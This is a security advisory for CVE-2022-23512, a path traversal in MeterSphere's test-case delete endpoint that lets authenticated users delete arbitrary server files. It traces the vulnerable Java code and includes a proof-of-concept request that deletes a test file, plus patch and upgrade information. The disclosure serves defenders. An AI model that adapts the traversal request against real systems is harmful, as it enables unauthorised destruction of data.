Headline
CVE-2022-23512: Path Injection in Metersphere leads to Arbitrary File Delete
MeterSphere is a one-stop open source continuous testing platform. Versions prior to 2.4.1 are vulnerable to Path Injection in ApiTestCaseService::deleteBodyFiles which takes a user-controlled string id and passes it to ApiTestCaseService, which uses the user-provided value (testId) in new File(BODY_FILE_DIR + “/” + testId), being deleted later by file.delete(). By adding some camouflage parameters to the url, an attacker can target files on the server. The vulnerability has been fixed in v2.4.1.
Package
maven io.metersphere:metersphere (Maven)
Affected versions
< 2.4.1
Summary
A Path Injection in ApiTestCaseService::deleteBodyFiles allows any authenticated user to delete arbitrary files on the server.
Details
Metersphere’s ApiTestCaseController loads a /delete/{id} endpoint which takes a user-controlled string id and passes it to ApiTestCaseService’s delete method.
// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/controller/definition/ApiTestCaseController.java#L127 @GetMapping(“/delete/{id}”) … public void delete(@PathVariable String id) { apiTestCaseService.delete(id); }
ApiTestCaseService’s delete method passes the former id (now testId) to ApiTestCaseService’s deleteBodyFiles.
// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L331 public void delete(String testId) { … deleteBodyFiles(testId); … }
Which uses the user-provided value (testId) in new File(BODY_FILE_DIR + “/” + testId), being deleted later by file.delete().
// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L365 public void deleteBodyFiles(String testId) { File file = new File(BODY_FILE_DIR + “/” + testId); FileUtil.deleteContents(file); if (file.exists()) { file.delete(); } }
Proof of Concept
- Log in with an account (can be non-administrator)
- Create a file that the PoC will delete:
docker exec -it $(docker ps -q --filter “name=ms-server”) touch /tmp/DELETE_ME docker exec -it $(docker ps -q --filter “name=ms-server”) ls /tmp/DELETE_ME
Send the following request replacing the SESSION cookie and CSRF-TOKEN header:
GET /api/testcase/delete/…%2F…%2F…%2F…%2Ftmp%2FDELETE_ME HTTP/1.1 Host: 127.0.0.1:8081 CSRF-TOKEN: <CSRF-TOKEN> Cookie: SESSION=<SESSION-COOKIE>
- Verify that the file was deleted:
docker exec -it $(docker ps -q --filter “name=ms-server”) ls /tmp/DELETE_ME
Patches
The vulnerability has been fixed in v2.4.1.
- b5b4c51: No longer can arbitrary files be deleted.
Workarounds
It is recommended to upgrade the version to v2.4.1.
For more information
If you have any questions or comments about this advisory, please open an issue.